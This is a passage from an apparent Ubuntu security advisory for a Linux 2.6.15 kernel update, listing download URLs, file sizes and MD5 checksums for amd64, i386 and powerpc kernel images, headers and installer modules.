http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
  Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   202666 71d8be83541874d6c675945838b9e223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49294 e4a805200acaaea274e67995602294e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    35158 0869bee234a54b1afe362123606efe66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    33806 ebf707126fa6326899d648786afa8779
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
  Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53554 afc415fd0a28c363579986fc48464671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29892 4a807f384985ae3376d509474716f13a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45054 a2373aac90339698b2cba11e43978565
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     1934 0887612df6acbc867949c33251427c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   115862 3cd4a494b7d9652bd77eb9dda6d2eeb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   116548 a40033c7a63dda0aa5911caf2dd7f49a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  1925072 2c1fefed78a6ebc795887a2f27c9db4e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:  2449126 39606af1d24872f0ff053ef5ddf790bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872990 d1ced46d4302cb78b2d47c5ea678d6bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5:   872596 8602056ab95806f02667587737cb3b59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb
  Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb
  Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb
  Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    17386 1abc2376b554610aec23e87f60998358
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6
